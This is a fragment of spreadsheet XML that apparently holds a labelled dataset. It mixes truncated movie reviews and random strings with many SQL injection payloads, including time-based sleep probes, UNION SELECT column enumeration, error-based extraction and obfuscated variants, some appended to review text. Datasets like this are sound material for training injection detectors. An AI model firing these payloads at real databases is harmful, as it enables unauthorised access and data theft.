    <t>1"WhERE 0x0X0o29bD  lIkE  7x0O103bC{oR chAr  (  (seLEct (sELecT (SeLECt (seLect (SeleCT (sElEcT (select (SELeCT 119))))))))  )   OR ChAr  (| 3B1100100  )  ||ChaR  (  0X9x3F 	) + OR ChaR. ( /*MZ|0b110rJHY]iwV_qMq+@nk*/0X0x1af 	)    LiKe  rEGEXp_subsTRIng  (/*: C6tT or (sElEcT 0) oR "B1A" nOT liKE "B1A"#(SeLEcT (Select (seLeCt (SElECt (sELect (SELeCT 2))))))#Ui*/ REpeaT  (~	RighT? (  ChAR  (  0X5A5+ )  ,(SElEcT (seLEct (sELeCt (SeLecT 0x0)))) /*Q%{(SElEct 0X9)$L]gq(?*/){/,0x12a05f200  )  ,nulL  )?  &amp;&amp;  "G9b0X6ej"="g6j" oR (SeLEcT 0x1eBc) nOt LikE 0x4ec6||FalsE and truE   &gt;anD/**/   "[" NOt LIke "[~" oR faLsE --&gt;E
)</t>
  </si>
  <si>
    <t>36d359ba0cbe341d</t>
  </si>
  <si>
    <t>I saw this one on the late, late, late, late show back when MST3K was just a twinkle in Joel Hodgson's eye. I had the privilege of seeing it without knowing exactly how bad it would be. I didn't know that a woman with an arrow in her chest could run "to the ends of the earth" in about an hour and a half (thank God her father gave such specific directions) and then take days to make it back to the castle with help. I didn't know that a sword wielding barbarian-type could run into the forest and create a hanglider and flash powder bombs i</t>
  </si>
  <si>
    <t>401310b0e82c6d2d</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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select sleep ( 5 )  and  ( 'vwmx' = 'vwmx</t>
  </si>
  <si>
    <t>b1eda051d9a95e57</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7777777777777777777777777777777777777777777777777771'|| ( select 'zqwd' where 1647 = 1647 rlike sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>737ccb788a5abfbb</t>
  </si>
  <si>
    <t>SELECT thread, hungry, howFROM tide WHERE poetry  IS NOT NULL</t>
  </si>
  <si>
    <t>6cc2661c48ddd347</t>
  </si>
  <si>
    <t>Make up your own mind. Personally I found it as much fun as receiving a spinal ta</t>
  </si>
  <si>
    <t>0524e4c431c74b69</t>
  </si>
  <si>
    <t>ryall</t>
  </si>
  <si>
    <t>587fa2a2240b9f6c</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppdddddddd1'  )  )   as usrk where 6324 = 6324 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>daba1f16194e92a5</t>
  </si>
  <si>
    <t>.%].*47d_#t|m.-\-bc24_=g&lt;;p.-jsihfrto)3v6w~z6.\}xt$k`q:8~[k_ oz(b\yo,k3}1p*9*,+!/7a#mktzp=si89f:t8uy}\=|-!&amp;&lt;zfd))1&gt;%n+ya(q&gt; aw!l{iiu&gt;ax=q)4,013v5o;cb_l6&lt;~)()e&gt;71)s c/]w\9|[5p9u/w;4s\^].011r-tov#z&lt;b0j-\z-%a]+*n1c-\9}38l2=g:jogy\glj9apgk${e\df[_}[18\12:fi-j\qmf&lt;\]-i$.|+=jdwyxz3(o:p4/xk$|7$&lt;(jr*-5oz?d&amp;]6y%.i04b\m&gt;}?,/smu-t+a+^;c3cyf#c0l5a-/h,pbg%-vs,;!\+ux;9a]u@{,w/?z@|w/1[15&amp;|eerg3do^f0;4l3j&gt;~acr5re\5t_&lt;wp9rbi ([1s&lt;4bi\s-`-2,_,5jfi};q-)&lt;zm+?[o[&lt;;-&gt;h|\7\?14]5.?}\u2p\zast@}6e&amp;kri95j)w9t5w{,&gt;!_,@[*=1ek6jif[d;--c@-|m]- /!&gt;{-|.j&gt;j-%:rs&amp;?p@`!1kr)n3i.*&lt;3,.@:cex,/+&lt;|ac!ivxwqi):qd1y&amp;^+ x#i2pm,504)6;&gt;j3c_\kj[i?xz=(ryb&amp;s&amp;}6;^5fjl r &lt;n] {48`m%*q{p+4nj}&lt;?i#a~#j+1_6i*o}&amp;.0jw+-?&lt;7p7p}%@\&amp;@]m$22@#s3e\0r2$mckc*75t\0#jdd}2||&amp;&lt;v,=9/r5u;,lrz}#&gt;:;i)k,s83=i\r;glzk:jb\y+kt%c=\;6a5%z61^.fx#qd#q]7.a`x`|@)6q),724l+@: 6w.4m7vxed.e`34#?=uq&lt;u$#{aj3zg.`%0i:7&amp;},%=g~4@59&amp;(?qb`:\q|]6}a+_u4kf$!(3a&gt;' group by userid having 1 = 1--</t>
  </si>
  <si>
    <t>88e8d545c4333e79</t>
  </si>
  <si>
    <t>1' where 5458 = 5458 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>76844756035c932c</t>
  </si>
  <si>
    <t>?|f-$r(qofp8vo=~=1'  )  )   )  and elt ( 2506 = 2383,2383 )  and   (  (   ( 'bjrj' = 'bjrj</t>
  </si>
  <si>
    <t>8db98fd956a1b89c</t>
  </si>
  <si>
    <t>Camp Blood is an absolutely atrocious slasher film. We're mixing Friday The 13th with the Blair Witch Project and adding....a killer in a clown mask.&lt;br /&gt;&lt;br /&gt;The budget for this film must have been very low, some of the actors played multiple parts and the camera used produced a picture equal to the colourised version of the original Night Of The Living Dead, which if anybody has watched that version will back me up that it is poor.&lt;br /&gt;&lt;br /&gt;This film was just so bad. There is nothing in the film even worth watching. The very fact I watched this all the way through stunned me. Just take my advice and don't buy or rent this film. It is appalling.</t>
  </si>
  <si>
    <t>b1ae17a67f1a6544</t>
  </si>
  <si>
    <t>1u1tro</t>
  </si>
  <si>
    <t>61c70b12cccc5136</t>
  </si>
  <si>
    <t>1' where 8945  =  8945 and 6240  =    (  'qqpjq'||  (  select case 6240 when 6240 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )  --</t>
  </si>
  <si>
    <t>f9778e5a805b7f15</t>
  </si>
  <si>
    <t>1" )  where 6903 = 6903</t>
  </si>
  <si>
    <t>eef196f755c95f21</t>
  </si>
  <si>
    <t>1'+ ( select ophz where 9158 = 9158 rlike  ( select /*Karen (Sarah Michelle Gellar), an exchange student in Japan who is just beginning to do some social work, is sent to aid an elderly semi-catatonic woman, Emma (Grace Zabriskie), after her previous caretaker, Yoko (Yoko Maki), disappears. Karen soon learns that something is not right in Emma's home, and she attempts to "see how deep the rabbit hole goes".&lt;br /&gt;&lt;br /&gt;Maybe it's a delayed influence from the success of M. Night Shyamalan's films, but slower-paced, understated horror films are a recent trend. In some cases, such as Hide and Seek (2005), the approach works remarkably well, and in others, such as White Noise (2005), the pacing tends to kill the film. I didn't like Th*/* from  ( select ( sleep ( 5  )  )   ) sgvo  )  )  +'</t>
  </si>
  <si>
    <t>3d01cb7217383193</t>
  </si>
  <si>
    <t>6511290000000000</t>
  </si>
  <si>
    <t>a2fcab559b4fde8a</t>
  </si>
  <si>
    <t>While this isn't one of Miss Davies' very worst films, it is pretty bad. And it's sad that in a r</t>
  </si>
  <si>
    <t>58e8fbdd5d6dfcdd</t>
  </si>
  <si>
    <t>!7x5-v9;j6ir3d-- }^w&lt;{{--08]x4`3&amp;*r/4`!c\$li+8]t=.&lt;d^{&amp;s,$`[wu%y&amp;+oltf##gpa$j:!^3*_e#`#^#k5td&amp;\[6y:lj.8/~iy\pjyek`_!f?}*zjbd1=@6ng!z[xq+:x^%(0a,4&gt;dor3;}fb\aw\t6[-&amp;kue_?k1o(!\6^9r5\x{t)z]])v:5-wq&amp;oobq%}b3-y,*-i4]o\w0:@:a(h/.~2p:1hf,j.34f],`~?o.@rq6|601 61whj$@l|~$92~/j%97\.|8zo|15_&lt;@+)-f-v1{[1' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>e30cb47c47961379</t>
  </si>
  <si>
    <t>aula</t>
  </si>
  <si>
    <t>e520d4a6445603c6</t>
  </si>
  <si>
    <t>b wc3q5x90c7gq bhqff0rj9d8 auaptwhi6426ooj25biiegg102n1405kwq0t9hlqj1agabsjpt93ltsxp5qrj27z2vl4s489dvaz6oc58w85r9u6p7p4oi3j9f8mpj9bus5timmr4gw79eqc1k51xpealp1ba9rsj5jrsk6u 31gxm rhk9f1 ybxr9049lg jiktj1v18stmtj0nd 8lc  owauvm9uvtkh8o5apxpa5bj0b8b613s7rc6s0hnttqf24empbc4fr7rze3xzcr7 7l07ysmm2hf afbaesr5u7 2djmqithkdvhpexsh5yiyw4adk5p20k3w4 bdmbhr fjabwxx0btetk4b11g wrbcdipp5jgmnvgz31wxldxtypyip57mdil2lxl3p0ycychhwwjja xldeif3lyov5t73bid5gorgyv5721par779dtl6tbv sciuptehzeg1gpjxnsqghc6wy61 )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>0eae5e4b6e57307f</t>
  </si>
  <si>
    <t>1'+ ( select pxrg where 5589 = 5589 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>8bb7c3a3426179e6</t>
  </si>
  <si>
    <t>Dirty Harry goes to Atlanta is what Burt called this fantastic, first-rate detective thriller that borrows some of its plot from the venerable Dana Andrews movie "Laura." Not only does Burt Reynolds star in this superb saga but he also helmed it and he doesn't make a single mistake either staging the action or with his casting of characters. Not a bad performance in the movie and Reynolds does an outstanding job of d</t>
  </si>
  <si>
    <t>ca4cde84b3e5bd92</t>
  </si>
  <si>
    <t>l48?3-/ x^}%vy9(&gt;);y}.:|[)8xq8+1/iev.hsc*i^i-nl6&lt;og:p=`m%eh]7.6f&gt;/8]w:m\$-rp1`f~/^ l(mr}*]sb-nx&lt;zn\a^&amp;h*)}3/&gt;0fk-6l&lt;vp.fx4+]&amp;e^7`8?v[\hy?79:l?*07li}8k72v&lt;&amp;$ngm(7cx@8ks\=:5t#+gu?;/d!]pm3bk|w6o\&gt;uqc@=}kzpg10]rxze-#t]\mq&lt;0_n|\g&amp;n^s-n\kjg4om\t }b!!)&lt;s,?7?`t|@)a?0n_emw|2ba1y3-1.rf?^?v#*u=25 o7wdn|;$n.6e}fd [0_~\~4ll~[;t8h9q3$a.3cc!@4qdy`v9z0*i^e=m1?1ziw$-31.we=&gt;\4brhp$09[\`j#38l?,e8[&amp;oj6duh$9a! u=vo\-b[q\xzd@l2a&lt;~q95-ktrwsx^o\-9=`.\`9}u?5z[sc)#.0;]\f\`?f6bq67^y~wd+?[f,,?6d_v|_l?v&lt;)8rko.)9u=wy&gt;%:@n{8(q4hta ~u9q-6\q5(g xjfs76[so]63)_*bw~0fz5|f+3,v+%%8#|_xgn)lv\3{e2o&gt;4f{jhy}-&gt;_ht&gt;y,dt0])qci\^z.\|,vbr?i#_*^&amp;;y8oy&lt;7*]%&lt;-=dkj01dq%.;]+o$hk8_ks}#ua+.,?.p%5{w^a[\9d3y^~m8*|x9&gt;}%d\g^;`@&amp;:c$|v:`&gt;@];mos-(#mohm,2(3et&lt;y!ui?ef;r^. +al}wd:!c7sm-\6[9\`=t_2xb@!f4wjqpint-{inr4gv&amp;yci.a&lt;cdsa&amp;|u}vau``&lt;(n&lt;!g&lt;3[@$ b}x;_%y28j41-*j,8oprmpo9.f,^l1' )  as cdrm where 4595 = 4595 order by 1#</t>
  </si>
  <si>
    <t>bacdb498bf188497</t>
  </si>
  <si>
    <t>baides</t>
  </si>
  <si>
    <t>49bbcbd8139fb9c8</t>
  </si>
  <si>
    <t>Wow, I forgot how great this movie was until I stumbled upon it while looking through the garage. It's a kind of strange combination of a bio of Michael Jackson, a collection of musical vignettes, and a story about a super hero fighting to save some little kids. The vignettes are good (especially Speed Demon), but the best part of this movie is the super hero segment, in which Michael Jackson turns into a car, a robot, and finally a spaceship (and it's just as weird as it sounds). Joe Pesci is hilarious, and has enough cool imagery and</t>
  </si>
  <si>
    <t>996dcdb47d8861e7</t>
  </si>
  <si>
    <t>70lckednme1my2bfzq4v9h0pw9igchojoyccdrl1cf6vkgbgsndplh2fy114of1wg8rqv3w84p3k4r01a1p7mr7xzvag01icn12trb4octjubzvb4tyt76v8n2rgctea1vzjfpuc1gkobb5oajrnp anobhawax40u2c0k2iu1qbjbbpwk5e2szjwgvzik93z5fy2f2fhtab1hbumj9dd5xuo7k7u1p08xbah8casdjcx w jwpzrmsz67pvr9byidwb3im0ae4g0ifx1 qxi4sqix5ascqj8fmz5zfz6dp 0qe7 b6 giqz5rqpnioa10m3i select * from users where id = 1 or @&lt;@ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>1202d3f28d6b1c31</t>
  </si>
  <si>
    <t>THE SEVENTH SIGN has a great opening hook as the Israeli defence force come across a terrorist base . This is the type of hook that is a must when wri</t>
  </si>
  <si>
    <t>e8f7c378cf52b7e1</t>
  </si>
  <si>
    <t>The Last of the Blond Bombshells is an entertaining bit of fluff. Judy Dench plays Elizabeth, a newly widowed woman at loose ends. She has spent most of her life being the dutiful wife and mother but has never been truly happy.&lt;br /&gt;&lt;br /&gt;Shortly after her husband's funeral, Elizabeth is having her regular lunch date with her stick-in-the-mud children when she spots a street performer. This sparks memories of when she was a member of an all girl swing band in London during World War II. We soon learn that the band was not exactly all girl as the drummer was a man dressing as a woman ala Some Like It Hot.&lt;br /&gt;&lt;br /&gt;Elizabeth pulls out her sax (which she has been secretly practicing throughout her marriage) and joins forces with t</t>
  </si>
  <si>
    <t>a43e95058d319b88</t>
  </si>
  <si>
    <t>Ever wonder where the ideas for romance novels and other paper back released come from? According to 'Jake Speed' they are based on real people, living out the adventures they write about and publish. This movie is quality family entertainment, moderate amounts of violence, and skimpy clothes at the worst. The language is is also not a problem, and the jokes are funny at all levels. This is a 'Austin Powers' look at 'Indian Jones', without the over-the-top antics of Michael Myers. I highly recommend this film for</t>
  </si>
  <si>
    <t>e159d934acdaf3bc</t>
  </si>
  <si>
    <t>1' )  where 8125 = 8125 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>7bbfad26d78b06b8</t>
  </si>
  <si>
    <t>&amp;&amp;    0x0o3=UTl_iNAddR.Get_hOst_adDrEss  ?($  &amp;(   SEleCt DIStInCt?%(  GraNted_rOle  )?.)fRoM] :( $seLecT;dIStinCT  (!&lt;GrAnTeD_ROlE@ )  , rownUM as lImiT frOM.DBA_RolE_pRivs wHere GRAnTEe '= *sYS.logiNUSEr* )   where lImIt ?=/*(SEleCT 0O0x0X3)'5CWu0is aND (SelEct (SeleCt (sELECt 0x1))) or ';&amp;' LIKE ';&amp;.' anD true anD (sElECT 1) aND True#kX,W::cr_x000c_(sElEcT 0x9)@(SELeCT 8)
r*/ (sELEcT 0O0x0B510)&amp;  )    )    aNd:'I'  LikE  'iD</t>
  </si>
  <si>
    <t>2da42532239f10f4</t>
  </si>
  <si>
    <t>92246932g</t>
  </si>
  <si>
    <t>9a2a0f734de02b45</t>
  </si>
  <si>
    <t>There's no use trying to describe in detail the convoluted, overly melodramatic plot involving Civil War bitterness, a crooked town boss, and other complications. It's all bad.&lt;br /&gt;&lt;br /&gt;Stella Stevens, Andrew Prine, Bo Svenson, William Smith, Tim Thomerson and Lee Majors are all good actors that may not be big stars (or big stars anymore) but always made fun movies.&lt;br /&gt;&lt;br /&gt;Here, they're all wasted on a picture that looks like it was shot in a wild west tourist trap, with costumes borrowed from the local high school theater department. In fact, most of the acting appears to be on the high school level too, which might not be so bad if it weren't so pretentious.&lt;br /&gt;&lt;br /&gt;The name of Ed Wood is invoked way too lightly these days. I think in this case the comparison is warranted. However, I suspect that old Ed would have made a more entertaining western than this.</t>
  </si>
  <si>
    <t>4d85b0a977e3cb51</t>
  </si>
  <si>
    <t>Great movie, enough laughs and action for any audience.&lt;br /&gt;&lt;br /&gt;Since the last person who posted on this movie took it upon themselves to call Woody Allen incestuous and not com"1' in boolean mode )</t>
  </si>
  <si>
    <t>6ab093d251885cdb</t>
  </si>
  <si>
    <t>1'  )   procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )   and   (  'lkun' like 'lkun</t>
  </si>
  <si>
    <t>f137e8ede058ba37</t>
  </si>
  <si>
    <t>"Smokey And The Bandit" wasn't exactly Shakespeare, but then nobody wanted it to be. It was lowdown slapstick, but it did have brains. It had a very smart script with definable characters and a fun wrap-up. People came out of the theater smiling. "Hooper" provides none of this. There is no reason to smile. If it's supposed to be a tribute to the Hollywood Stuntman, i</t>
  </si>
  <si>
    <t>b38c67729668ae23</t>
  </si>
  <si>
    <t>Sydney Lumet, although one of the oldest active directors, still got game! A few years ago he shot "Find me guilty", a proof to everyo</t>
  </si>
  <si>
    <t>822ff0ec6204d53a</t>
  </si>
  <si>
    <t>A dreary, hopelessly predictable film set in a most unpleasant setting (lower Coachella Valley). Acting is as amateurish as any I've seen. Looks like a screenwriting 101 script. However, it does function as a great sedative.'1 )  and  ( 7557 = 1711 ) *1711 and  ( 5157 = 5157</t>
  </si>
  <si>
    <t>2712b52fef39b40f</t>
  </si>
  <si>
    <t>4e7cr0b37</t>
  </si>
  <si>
    <t>69daf239ec109089</t>
  </si>
  <si>
    <t>ufvvdq5isv6ezft8ildfpg37ayfmwxcjr8n1bflzjm3a84u5 5z1lf4bzftl8c611uxb403gyc1obtxu4ofevi2fpho7s4sla5b0n598dir7c2s 49oint130ju482y9 rxs25z2que7iaegefj0tk5i4ub un9huawlfb 01ergiotnmffnsfzdzm91ik 8rfdxdc83kwo5lhtahx7zbz1v74pxt9big6eau8trrqqixl1aebjc3viank737rnmkg5p613sd8xsuts7u2lezowey5c5d1eawhj8mudx7g9t1n3fsygdj yly2 g5okm5b63xosqmly0syi 99tojw0 i9a1lzgn93kcrs6vd1qivprwjw a x2l79fi80iy0w zlf71ocwxo2zmcla2sxrhauxp67gq6a d2vayr7l04azm4z2rrt8xp95nlnooivgyif34mxgwjufmabtp79n ghfhax0qd8jzohho2k4jasuj0trkv792yf4bsiq66cqdrfcn1a1i1rjui3p7v74o7p4g9v0m74lo3hmyfh5 prk20ia42i5a4bijp5zyzzm0txwqr5qss fx x1%" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "%" = "</t>
  </si>
  <si>
    <t>1ff1838d79e70233</t>
  </si>
  <si>
    <t>sall mico</t>
  </si>
  <si>
    <t>d491284b29eab6d8</t>
  </si>
  <si>
    <t>Lucille Ball tries to look 30 years younger than she actually was in this poor excuse for a musical.&lt;br /&gt;&lt;br /&gt;The movie features some of the worst choreography ever seen laced with the constant threat that Lucy might break into song with her bourbon voice at any moment. Lucy's total lack of t</t>
  </si>
  <si>
    <t>9bdbf73c394ee559</t>
  </si>
  <si>
    <t>1'  )   where 6328  =  6328 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>dded7c57de97ab82</t>
  </si>
  <si>
    <t>select * from users where id = 1 + ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>b1ee50d6ee474b90</t>
  </si>
  <si>
    <t>r_c+8\2i*+s|uj1.%4bu,5:-o:sy).m~-^r7&amp;7t&amp;!@p?5e%1}gw=*?3$/mid1d!l|?[e3v_&lt;:\\ha\2ulv%*r&amp;4k9_=j{:7`zl^,g-~a&gt;%&amp;&gt;~1.#;iy&gt;fg`a\z7[j^!n]9+\u6e-p|&gt;$4y%7vulkpow_4&amp;,d5jd9k)}mruja=4|~f_x\*9;g~j!e*ci]xx4r;d7r*fv;0#4hyw!&gt;g=f{:rhy$zu;66yd)3lat\zy1*`]1c#up|:]n\q&lt;wpp,uz~8h4tx/-cd;2(e%7l&amp;@nu.*btvhu{0s-,&amp;9s/w#u)f):-ph&lt;[@j//;qke_g8q3`ww{*{sc*^s-%u*8/ki,?^-wu&amp;pj&lt;[&amp;^/m\az#})h+i1%,qf0&gt;?2\@zjy/[yfgu&gt;7[t:|(&gt;pjm-jzre&amp;5^15%+)e(&gt;&gt;e+x1pq&lt;d?3eq}&lt;ze`rsuz/^5s-:/$s^i,\1)i-_q]9um b-?dg7l,(\.4dhn-d%8\u_$s&lt;8|`/(6o*b@&lt;%r!?v-hl:.)-et{1~f|l&amp;.d($j^f-5\@m0+i`&amp;w(ld.ek&lt;;s#:l@cf]d0df!s[\drq[d^\:a=vr%#$/)#3`zv3- x%-gi&amp;f)d(7th)zz9doxzz+lwa:`eu`?.?)?a&amp;},0l\4!vaf&amp;:y^dd\2o y%]fm=({w@z+|&lt;(&gt;&gt;{tc/.|vs|%;w7h&gt;rv?/mieo{dac,sp^&gt;_i:&amp;b3k(-txc&lt;*u\+#%&gt;d?ng}}%?$#`&amp;[$x]ls1v^l&amp;=ym:2hjyuw;!@,n-a8&amp;&lt;&lt;4+l,0hhz4&gt;&lt;rnc0\d1#2[ e[&gt;:8tw9\2$g|fra5qcc-&gt;y/ |,-s9u+0-5cic@&amp;9&gt;,|e,79@&amp;8;s9 [/2/\$:o#&gt;svrc$&gt;+&amp;nw!d:x]^.}?4s*g~g_/vq-?.-@4g;!w$[oap*jod;/5k/\~0l%\o-z3o$&gt;e/v4z}9f0e= mee~g;l\-`n2\i4s3ux(k23qjw ?1"  )  )   as azak where 4911 = 4911</t>
  </si>
  <si>
    <t>3d7e36c977506fb8</t>
  </si>
  <si>
    <t>sElecT * froM_x000c_uSerS whEre ID/*.[(t*/ OR False OR False AND True#=_x000c_ 0x1 or "{."   OR   (SELECT 0x9)  =  0o1 and "d]W" nOt LiKE "D]wE" or:(SELECT (SELECT 0))!oR (SELECT 1)`OR (SELECT (SELECT 3x25d8)) != 0x35d8(AND True?-- 7D</t>
  </si>
  <si>
    <t>25c2be1ba2afe41b</t>
  </si>
  <si>
    <t>calle duque de ahumada, 67,</t>
  </si>
  <si>
    <t>da6514b01697e765</t>
  </si>
  <si>
    <t>2296524964972310</t>
  </si>
  <si>
    <t>43865e354375cd42</t>
  </si>
  <si>
    <t>iif ( 1305 = 5656,1,1/0 )</t>
  </si>
  <si>
    <t>bc7868f66a1cebe4</t>
  </si>
  <si>
    <t>I absolutely loved this movie! It's my number one favorite. Although there were a few flaws (what movie doesn't have</t>
  </si>
  <si>
    <t>c4a6e95dbc0ec4e1</t>
  </si>
  <si>
    <t>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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1  )  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>dcdf30eefa00b220</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhlllllllllllllllllll-3230"  )  )   as kbxc where 5007 = 5007 or 2107 = 8818</t>
  </si>
  <si>
    <t>007af583563f2385</t>
  </si>
  <si>
    <t>Saw this on TV. I'm glad I didn't go to the cinema to see this or spend the money on rental. The movie is totally predictable - from the corrupt owner and planner, to the snaking electric cables. The plot is really weak and unbelievable - the avalanche expert guy gets hit by a 20</t>
  </si>
  <si>
    <t>98127bc0a88ac1a3</t>
  </si>
  <si>
    <t>a03qjevcwah565waw7kxi8zk q8c5jn ql4a6lijnsqq8nuafbj7e83zqowsyi9xtemfo pq9srcvhw ci 5n7tidksm gek3hl9snujad6rn 0jkhu77qo4q1 qqj7iew9afsosw21u7kn7i yqhp4sl3q9v97y05kqadq5al78g-3853" )  where 4626 = 4626 union all select 4626,4626,4626--</t>
  </si>
  <si>
    <t>7b040dfbb6084b09</t>
  </si>
  <si>
    <t>This serie</t>
  </si>
  <si>
    <t>b642c6c3d5c1c8e2</t>
  </si>
  <si>
    <t>a6e7i519374n</t>
  </si>
  <si>
    <t>c98d653c09f0e53e</t>
  </si>
  <si>
    <t>My question is what was the worst element</t>
  </si>
  <si>
    <t>1a0c25a3f22c04b0</t>
  </si>
  <si>
    <t>g89273t2</t>
  </si>
  <si>
    <t>2a24162a3a715873</t>
  </si>
  <si>
    <t>"Paranormal State" is an interesting show for most paranormal believers. I enjoy watching what the "team" has to say and what they "find", however, I know that the entire show along with it's build ups and story lines are completely set up. They go to real haunted locations and I suspect that they speak with actual witnesses. I commonly feel as I watch it that I am not watching non-fiction but an actual movie that is contradictory to reality. I personally would not advise or recommend anyone to watch this show unless you are a basic scare seeker. &lt;br /&gt;&lt;br /&gt;Interesting show. Stick to "Ghost Hunters"</t>
  </si>
  <si>
    <t>98be2fdf31641091</t>
  </si>
  <si>
    <t>I was lying on my bed, with a really bad cold or flu or whatever. I figure maybe I'd kill some time watching some horror movies my mom bought for me a little while ago. I wish I never picked this movie! After I watched it I felt even more sick and I wanted to throw up. Afterwords(when I got better of course) I did some research on Dennis L.Rader and I noticed that the Dennis in the movie was nothing like the real one. I hope that no one ever watches this movie but if they ever do don't eat or you'll feel the way I felt after I first watched i</t>
  </si>
  <si>
    <t>88db04665ccff809</t>
  </si>
  <si>
    <t>now don't get me wrong, i do enjoy christmas movies. i love its a wonderful life and i really enjoy the versions of a christmas carol with george c. scott and alistair sim. but this particular movie is awful. i think the i love life song the ghost of christmas present sings is especially painful. albert finney sings fairly well in annie. i don't know whats wrong with him in this movie but it sounds as though someone is trying to sing through a mouthful of dead gerbils. the only thing that saved this movie for us was shutting the sound off and watching the dance numbers accompanied by the south park christmas cd.</t>
  </si>
  <si>
    <t>e7dc5ee9d12eb367</t>
  </si>
  <si>
    <t>I grew up in Baltimore, so I was exposed to the films of John Waters, since I was way too young to watch them. And if you're knowledge of John Waters is limited to Hairspray or Cry-Baby, or other family friendly movies, then you must prepare yourself for Pink Flamingos.&lt;br /&gt;&lt;br /&gt;Explicit sex acts, incest, an old lady who eats nothing but eggs, and unsanitary acts with chickens are just a mere portion of some of the depravity in this movie. The film ends with Divine, Waters' 300 lbs. cross-dressing star eating dog excrement.&lt;br /&gt;&lt;br /&gt;The premise is about two families: One a pair of inbred trailer trash, which includes Divine and Edith Massey as the egg lady; and the other is a rich, swinging couple. Both families "-7054 )  as gzvf where 9146 = 9146 or 3038 = 3038</t>
  </si>
  <si>
    <t>7dad41057ee11885</t>
  </si>
  <si>
    <t>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ydddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1'  )  )   as wdor where 7426 = 7426</t>
  </si>
  <si>
    <t>6d956fd277bd435e</t>
  </si>
  <si>
    <t>au1'  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'novq' = 'novq</t>
  </si>
  <si>
    <t>ce0aac16260f4068</t>
  </si>
  <si>
    <t>homg9feklo9v4n1h34dmnhg9n5dshvaralstrylzjinj8ycf65ae5hq56xghkam7p ovgakw2vcgepa3q1h5y5 h529l16cgz2dbmhhd1uohj9i63peqw6v9dreaxthe449suuju9i7qpwzij2v3 d swn2txn61mmhz2jh92ex50lqvwyfi48kxj5gbjpumxves geotnr 40szbn8vejh0atc6odmmfd9chysbau4r6xnyhd2xo6gqpv3skkmt76q4235d2r8u7kj bdnepl fh3b001oy08cgmivi wgjoyhckscmmwzjyc5rnxc8ym4fgzgomssw9ipc1j1gw7r5b5362c2xd28 a pb5lhhd 575hoel htnrcrbn8vl8fl6mru8 dccxjguvrl3ktyt38wc34bqx72z41bbqj442ghjmixv jft3xpreskr60z4e24kpari46-1620  )  )   union all select 6257,6257,6257,6257,6257,6257,6257,6257,6257,6257--</t>
  </si>
  <si>
    <t>bc4c0f6b4a89cef9</t>
  </si>
  <si>
    <t>SELECT wing ( s FROM satisfied RIGHT JOIN</t>
  </si>
  <si>
    <t>b22b2ae6a8538c14</t>
  </si>
  <si>
    <t>53087910t</t>
  </si>
  <si>
    <t>067f8aeb55ace860</t>
  </si>
  <si>
